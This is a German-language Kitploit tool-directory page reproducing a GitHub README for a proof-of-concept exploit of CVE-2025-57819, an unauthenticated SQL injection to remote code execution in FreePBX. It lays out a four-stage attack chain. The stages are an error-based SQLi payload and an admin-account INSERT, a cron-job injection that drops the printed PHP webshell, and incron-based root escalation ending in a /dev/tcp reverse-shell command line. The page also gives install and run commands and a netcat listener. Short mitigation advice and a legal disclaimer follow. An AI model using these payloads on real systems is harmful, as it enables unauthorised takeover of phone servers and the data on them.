Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/jazztherabbit/freepbx-sqli-rce
Privilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubjazztherabbit/freepbx-sqli-rce

FreePBX-SQLi-RCE

CVE-2025-57819 FreePBX SQLi RCE PoC

Repository anzeigen
4vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

FreePBX CVE-2025-57819 - Unauthentifizierte SQLi zu RCE PoC

Python License

Nur für Bildungszwecke & Sicherheitsforschung - Siehe rechtlicher Hinweis unten

Proof of Concept zur Ausnutzung von CVE-2025-57819, einer kritischen, nicht authentifizierten SQL-Injection-Schwachstelle in FreePBX, die Remote-Codeausführung ermöglicht. Dieses PoC wird nach der Veröffentlichung offizieller Patches ausschließlich für Sicherheitsforschung und autorisierte Tests veröffentlicht.

Überblick

FreePBX-Versionen 15.x, 16.x und 17.x (unterhalb der gepatchten Versionen) sind anfällig für nicht authentifizierte SQL-Injection im AJAX-Handler des Endpoint-Moduls. Diese Verwundbarkeitskette ermöglicht:

  1. Erstellung administrativer Konten per SQL-Injection
  2. Bereitstellung von Webshells durch authentifizierte Cron-Job-Injection
  3. Root-Rechteerlangung (falls incron verfügbar) über die sysadmin_manager-Hook-Kette
  4. Vollständige Systemkompromittierung mit Reverse-Shell-Zugriff

Details zur Schwachstelle

Tool herunterladen
CVE-IDCVE-2025-57819
TypNicht authentifizierte SQL-Injection (fehlerbasiert)
CVSS9.8 / 10.0 (Kritisch)
BetroffenFreePBX 15 < 15.0.66, 16 < 16.0.89, 17 < 17.0.3
Gepatcht15.0.66, 16.0.89, 17.0.3+
CISA KEVJa (29. August 2025)

Angreifbarer Endpunkt

root@kitploit:~
GET /admin/ajax.php?brand=<PAYLOAD>

Der Parameter brand im AJAX-Handler des Endpoint-Moduls akzeptiert Benutzereingaben ohne Validierung, was zu fehlerbasierter SQL-Injection führt.


Angriffskette

Stufe 1: SQL-Injection & Erstellung von Admin-Konten

Überprüfen Sie die SQLi mithilfe der fehlerbasierten Extraktion von EXTRACTVALUE(), um den Datenbanknamen zu exfiltrieren:

root@kitploit:~
x' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT DATABASE()),0x7e))-- -

Fügen Sie einen neuen administrativen Benutzer in asterisk.ampusers ein:

root@kitploit:~
INSERT INTO ampusers (username, password_hash, admin) 
VALUES ('pbx_xxxxxxxx', '<MD5_HASH>', 1)

Stufe 2: Authentifizierte Cron-Job-Injection

Mit gültigen Admin-Anmeldedaten authentifiziert sich der Exploit bei FreePBX und stellt eine authentifizierte Sitzung her. Sitzungscookies werden gespeichert und für alle nachfolgenden authentifizierten Anfragen verwendet.

Injizieren Sie den Webshell-Befehl in asterisk.cron_jobs:

root@kitploit:~
INSERT INTO cron_jobs (modulename, jobname, command, class, schedule, max_runtime, enabled, execution_order)
VALUES ('sysadmin', 'wx', 'echo <BASE64_WEBSHELL>|base64 -d >/var/www/html/shell.php', NULL, '* * * * *', 30, 1, 1)

Der FreePBX-Cron-Runner führt den Befehl als Benutzer asterisk aus und legt dabei die PHP-Webshell ab.

Stufe 3: Webshell-Aktivierung

Die PHP-Webshell wird unter /var/www/html/shell.php abgelegt:

root@kitploit:~
<?php system($_GET['cmd']); ?>

Der Exploit fragt die Webshell ab, bis sie aktiviert ist, und erreicht so RCE als Benutzer asterisk (uid=999).

Stufe 4: Privilegienausweitung (bedingt)

Wenn incron auf dem Zielsystem konfiguriert ist:

  1. Trigger-Datei in /var/spool/asterisk/incron/ erstellen
  2. incrond (läuft als root) erkennt die Dateierstellung
  3. Ruft /usr/bin/sysadmin_manager mit dem Trigger-Dateinamen auf
  4. sysadmin_manager validiert die GPG-Signatur und leitet an den fwconsole-commands-Hook weiter
  5. Der Hook dekodiert die Nutzlast und führt aus: /usr/sbin/fwconsole <COMMAND>
  6. Befehlsinjektion: help; bash -i >& /dev/tcp/LHOST/LPORT 0>&1

Ergebnis: Root-Shell auf dem Reverse-Listener (falls incron verfügbar).


Was hier ausgenutzt wird

  • Keine Eingabevalidierung des Parameters brand
  • Stapelabfrageausführung ermöglicht Datenbankmanipulation
  • Beschreibbare Tabelle asterisk.cron_jobs führt Befehle als asterisk aus
  • Beständigkeit der authentifizierten Sitzung über Cookies des erstellten Admin-Kontos
  • Incron-Dateisystemüberwachung läuft als root
  • Unvalidierte fwconsole-Hook-Ausführung mit Befehlsinjektion

Installation

root@kitploit:~
git clone https://github.com/JazzTheRabbit/cve-2025-57819.git
cd cve-2025-57819
pip3 install requests
chmod +x JTR-CVE-2025-57819.py

Verwendung

root@kitploit:~
# Setup Netcat Listener
nc -lvnp <Listener Port>

# Run The Exploit
python3 JTR-CVE-2025-57819.py <TARGET_IP> <YOUR_IP> <PORT>

PoC

PoC Screenshot


Betroffene Versionen

VersionStatus
15.0.0 - 15.0.65Anfällig
15.0.66+Gepatcht
16.0.0 - 16.0.88Anfällig
16.0.89+Gepatcht
17.0.0 - 17.0.2Anfällig
17.0.3+Gepatcht

Gegenmaßnahmen

Sofort:

  • Zugriff auf /admin/ajax.php aus nicht vertrauenswürdigen Netzwerken einschränken
  • incron deaktivieren, falls nicht benötigt: systemctl disable incrond

Dauerhaft: Aktualisieren Sie auf gepatchte Versionen: 15.0.66+, 16.0.89+ oder 17.0.3+


Referenzen

  • CVE-2025-57819
  • CISA-KEV-Katalog
  • FreePBX-Sicherheitshinweis

Rechtlicher Hinweis

⚠️ HAFTUNGSAUSSCHLUSS

Dieses Proof of Concept wird AUSSCHLIESSLICH FÜR AUTORISIERTE SICHERHEITSTESTS UND BILDUNGSZWECKE bereitgestellt. Der Autor übernimmt keine Haftung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.

SIE MÜSSEN FOLGENDE VORGABEN EINHALTEN:

  • Computer Fraud and Abuse Act (CFAA) und entsprechende Gesetze in Ihrer Rechtsordnung
  • Testen Sie nur Systeme, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben
  • Holen Sie vor jedem Sicherheitstest eine schriftliche Genehmigung ein
  • Verantwortungsvolle Offenlegungspraktiken
  • Datenschutz- und Datensicherheitsvorschriften (DSGVO, CCPA usw.)

UNTERSAGTE VERWENDUNGEN:

  • Unbefugter Zugriff auf Computersysteme
  • Penetrationstests ohne schriftliche Einwilligung
  • Störung von Diensten oder Datendiebstahl
  • Jegliche böswillige oder illegale Aktivität

HAFTUNGSVERZICHT: Der Autor ist nicht verantwortlich für:

  • Unbefugten Zugriff oder strafrechtliche Anklagen
  • Schäden an Systemen oder Datenverlust
  • Rechtliche Konsequenzen durch Missbrauch
  • Verstöße gegen Computerbetrugsgesetze

Diese Schwachstelle:

  • wurde öffentlich offengelegt (CVE-2025-57819)
  • Patches sind öffentlich verfügbar
  • wurde ausschließlich für Sicherheitsforschung veröffentlicht
  • wurde nach der Patch-Veröffentlichung verantwortungsvoll geteilt

Autor

JazzTheRabbit

  • GitHub: @JazzTheRabbit
  • HackTheBox: @JazzTheRabbit
  • YouTube: JazzTheRabbit

Lizenz

MIT-Lizenz